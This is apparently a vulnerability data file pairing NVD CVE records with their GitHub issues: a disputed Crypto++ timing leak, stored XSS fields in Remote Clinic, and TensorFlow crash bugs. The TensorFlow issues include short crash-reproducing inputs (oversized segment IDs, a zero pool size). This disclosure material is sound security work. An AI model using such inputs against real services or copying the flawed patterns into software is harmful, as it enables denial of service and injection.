Crypto++ (aka Cryptopp) 8.6.0 and earlier contains a timing leakage in MakePublicKey(). There is a clear correlation between execution time and private key length, which may cause disclosure of the length information of the private key. This might allow attackers to conduct timing attacks. NOTE: this report is disputed by the vendor and multiple third parties. The execution-time differences are intentional. A user may make a choice of a longer key as a tradeoff between strength and performance. In making this choice, the amount of information leaked to an adversary is of infinitesimal value
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://cryptopp.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://cryptopp.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*", "matchCriteriaId": "38083732-7F2F-45F1-B773-8BD7A039F08B", "versionEndExcluding": null, "versionEndIncluding": "8.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/weidai11/cryptopp/issues/1080
[ "Exploit", "Third Party Advisory" ]
github.com
[ "weidai11", "cryptopp" ]
I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu 18.04. The function is as follows: ```c++ void ECC_PrivatetoPublic(string priv){ using namespace CryptoPP; clock_t start, finish; ECDSA<ECP, SHA256>::PrivateKey privateKey; ECDSA<ECP, SHA256>::PublicKey publicKey; const Integer privStr(priv.c_str()); const DL_GroupParameters_EC<ECP>& curve = ASN1::secp521r1(); privateKey.Initialize(curve, privStr); privateKey.MakePublicKey(publicKey); std::string x = IntToString<>(publicKey.GetPublicElement().x, 10); std::string y = IntToString<>(publicKey.GetPublicElement().y, 10); printf("%s\n%s\n", x.c_str(), y.c_str()); return; } ``` It seems that the execution time of `privateKey.MakePublicKey(publicKey)` is positively correlated with the length of the private key instead of a constant value. I did a simple experiment and heres the result. But I haven't studied the reason yet. ![Wizard data (2)](https://user-images.githubusercontent.com/60092417/139213492-dbdad26d-54e7-479a-a8d7-9f03cea053f1.png) I suppose this may leak the length information of the input private key and facilitate malicious attacks on key decryption. Besides, the execution time becomes abnormally long when the private key reaches hundreds of bytes long, which causes a little inconvenience to me. Hope you can check this case.
Correlation Between Key Length and Execution Time
https://api.github.com/repos/weidai11/cryptopp/issues/1080/comments
14
2021-10-28T08:39:07Z
2022-08-17T12:24:58Z
https://github.com/weidai11/cryptopp/issues/1080
1,038,244,979
1,080
2,758
CVE-2021-43398
2021-11-04T21:15:09.520
Crypto++ (aka Cryptopp) 8.6.0 and earlier contains a timing leakage in MakePublicKey(). There is a clear correlation between execution time and private key length, which may cause disclosure of the length information of the private key. This might allow attackers to conduct timing attacks. NOTE: this report is disputed by the vendor and multiple third parties. The execution-time differences are intentional. A user may make a choice of a longer key as a tradeoff between strength and performance. In making this choice, the amount of information leaked to an adversary is of infinitesimal value
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://cryptopp.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://cryptopp.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*", "matchCriteriaId": "38083732-7F2F-45F1-B773-8BD7A039F08B", "versionEndExcluding": null, "versionEndIncluding": "8.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weidai11", "cryptopp" ]
I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu 18.04. The function is as follows: ```c++ void ECC_PrivatetoPublic(string priv){ using namespace CryptoPP; clock_t start, finish; ECDSA<ECP, SHA256>::PrivateKey privateKey; ECDSA<ECP, SHA256>::PublicKey publicKey; const Integer privStr(priv.c_str()); const DL_GroupParameters_EC<ECP>& curve = ASN1::secp521r1(); privateKey.Initialize(curve, privStr); privateKey.MakePublicKey(publicKey); std::string x = IntToString<>(publicKey.GetPublicElement().x, 10); std::string y = IntToString<>(publicKey.GetPublicElement().y, 10); printf("%s\n%s\n", x.c_str(), y.c_str()); return; } ``` It seems that the execution time of `privateKey.MakePublicKey(publicKey)` is positively correlated with the length of the private key instead of a constant value. I did a simple experiment and heres the result. But I haven't studied the reason yet. ![Wizard data (2)](https://user-images.githubusercontent.com/60092417/139213492-dbdad26d-54e7-479a-a8d7-9f03cea053f1.png) I suppose this may leak the length information of the input private key and facilitate malicious attacks on key decryption. Besides, the execution time becomes abnormally long when the private key reaches hundreds of bytes long, which causes a little inconvenience to me. Hope you can check this case.
Correlation Between Key Length and Execution Time
https://api.github.com/repos/weidai11/cryptopp/issues/1080/comments
14
2021-10-28T08:39:07Z
2022-08-17T12:24:58Z
https://github.com/weidai11/cryptopp/issues/1080
1,038,244,979
1,080
2,759
CVE-2021-39416
2021-11-05T16:15:07.710
Multiple Cross Site Scripting (XSS) vulnerabilities exists in Remote Clinic v2.0 in (1) patients/register-patient.php via the (a) Contact, (b) Email, (c) Weight, (d) Profession, (e) ref_contact, (f) address, (g) gender, (h) age, and (i) serial parameters; in (2) patients/edit-patient.php via the (a) Contact, (b) Email, (c) Weight, Profession, (d) ref_contact, (e) address, (f) serial, (g) age, and (h) gender parameters; in (3) staff/edit-my-profile.php via the (a) Title, (b) First Name, (c) Last Name, (d) Skype, and (e) Address parameters; and in (4) clinics/settings.php via the (a) portal_name, (b) guardian_short_name, (c) guardian_name, (d) opening_time, (e) closing_time, (f) access_level_5, (g) access_level_4, (h) access_level_ 3, (i) access_level_2, (j) access_level_1, (k) currency, (l) mobile_number, (m) address, (n) patient_contact, (o) patient_address, and (p) patient_email parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Product", "Vendor Advisory" ], "url": "https://remoteclinic.io" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://sisl.lab.uic.edu/projects/chess/remote-clinic/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Vendor Advisory" ], "url": "https://remoteclinic.io" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://sisl.lab.uic.edu/projects/chess/remote-clinic/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/17
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
In Remote Clinic v2.0, there are multiple Cross-Site Scripting vulnerabilities via the Contact, Email, Weight, Profession, ref_contact, and address parameters in /patients/register-patient.php are vulnerable due to the _POSTs not being sanitized properly for XSS despite being sent through the friendly function. In Remote Clinic v2.0, there is Stored Cross-Site Scripting and no sanitization for the gender, age, serial parameters when retrieved by _POST in /patients/register-patient.php to be sent to the database. This is possible by changing the values in the dropdowns in the inspect menu. In Remote Clinic v2.0, in patients/edit-patient.php, the Contact, Email, Weight, Profession, ref_contact, and address parameters being edited are not sanitized for Cross-Site Scripting when they are retrieved by _POST. In Remote CLinic v2.0, in patients/edit-patient.php, the serial, age, and gender dropdowns are able to be changed via the inspect menu In Remote Clinic v2.0, in staff/edit-my-profile.php, the Title, First Name, Last Name, Skype, and Address parameters sent by _POST to be put in the database, is unsanitized and prone to Cross-Site Scripting (XSS) In Remote Clinic v2.0, in clinics/settings.php, most of the parameters being passed into the database are sanitized insufficiently. The parameters that allow Cross-Site Scripting are portal_name, guardian_short_name, guardian_name, opening_time, closing_time, access_level_5, access_level_4,access_level_ 3, access_level_2, access_level_1, currency, mobile_number, address, patient_contact, patient_address, and patient_email.
Multiple Cross Site Scripting Vulnerabilities in Remote Clinic V2.0
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/17/comments
2
2021-08-16T11:38:23Z
2022-03-04T13:49:45Z
https://github.com/remoteclinic/RemoteClinic/issues/17
971,647,775
17
2,760
CVE-2021-41195
2021-11-05T20:15:07.707
TensorFlow is an open source platform for machine learning. In affected versions the implementation of `tf.math.segment_*` operations results in a `CHECK`-fail related abort (and denial of service) if a segment id in `segment_ids` is large. This is similar to CVE-2021-29584 (and similar other reported vulnerabilities in TensorFlow, localized to specific APIs): the implementation (both on CPU and GPU) computes the output shape using `AddDim`. However, if the number of elements in the tensor overflows an `int64_t` value, `AddDim` results in a `CHECK` failure which provokes a `std::abort`. Instead, code should use `AddDimWithStatus`. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46888" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/pull/51733" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cq76-mxrc-vchh" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46888" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/pull/51733" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cq76-mxrc-vchh" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C", "versionEndExcluding": "2.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/tensorflow/tensorflow/issues/46888
[ "Patch", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below):2.1.0 - Python version:3.7.6 - Bazel version (if compiling from source):N/A - GCC/Compiler version (if compiling from source):N/A - CUDA/cuDNN version:N/A - GPU model and memory:N/A **Describe the current behavior** tf.math.segment_max/min/mean/sun/prod crashes(aborts) when `segment_ids` is large **Describe the expected behavior** expect an exception message if the input is unexpected instead of crash **Standalone code to reproduce the issue** ~~~python tf.math.segment_max(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_min(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_mean(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_sum(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) tf.math.segment_prod(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) ~~~ Output: ~~~python 2021-02-03 16:44:25.849065: F tensorflow/core/framework/tensor_shape.cc:405] Check failed: 0 <= new_num_elements (0 vs. -1684338830784658056) Aborted (core dumped) ~~~ Related issue: #46696
tf.math.segment_max/min/mean/sun/prod crashes(aborts) when segment_ids is large
https://api.github.com/repos/tensorflow/tensorflow/issues/46888/comments
4
2021-02-03T16:47:27Z
2021-10-28T00:38:23Z
https://github.com/tensorflow/tensorflow/issues/46888
800,507,514
46,888
2,761
CVE-2021-41196
2021-11-05T20:15:07.780
TensorFlow is an open source platform for machine learning. In affected versions the Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative. This is due to the TensorFlow's implementation of pooling operations where the values in the sliding window are not checked to be strictly positive. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/51936" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m539-j985-hcr8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/51936" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m539-j985-hcr8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C", "versionEndExcluding": "2.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "191" ]
191
https://github.com/tensorflow/tensorflow/issues/51936
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): yes - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: n/a - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below): 2.6.0 - Python version: 3.6.8 - Bazel version (if compiling from source): n/a - GCC/Compiler version (if compiling from source): n/a - CUDA/cuDNN version: n/a - GPU model and memory: n/a **Describe the current behavior** `tf.keras.layers.MaxPooling3D` crashes when `pool_size` contains `0`, and outputs a all-inf tensor when `pool_size` contains negative values. **Describe the expected behavior** Expect a `ValueError` to be thrown if the input `pool_size` contains zero or negative values. **Standalone code to reproduce the issue** If the `pool_size` has `0`: ``` import tensorflow as tf pool_size = [2, 2, 0] layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size) input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32) res = layer(input_tensor) # crash ``` Outputs: ``` Floating point exception (core dumped) ``` If the `pool_size` has negative values: ``` import tensorflow as tf pool_size = [2, 2, -2] layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size,) input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32) res = layer(input_tensor) print(res) ``` The output is a tensor with `shape`=`(3, 3, 9, 14, 12)` and all `inf` values.
tf.keras.layers.MaxPooling3D crashes
https://api.github.com/repos/tensorflow/tensorflow/issues/51936/comments
8
2021-09-10T21:36:31Z
2023-09-21T10:18:55Z
https://github.com/tensorflow/tensorflow/issues/51936
993,613,787
51,936
2,762
CVE-2021-41197
2021-11-05T20:15:07.843
TensorFlow is an open source platform for machine learning. In affected versions TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` would return a negative result. In the majority of TensorFlow codebase this then results in a `CHECK`-failure. Newer constructs exist which return a `Status` instead of crashing the binary. This is similar to CVE-2021-29584. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46890" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/51908" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": 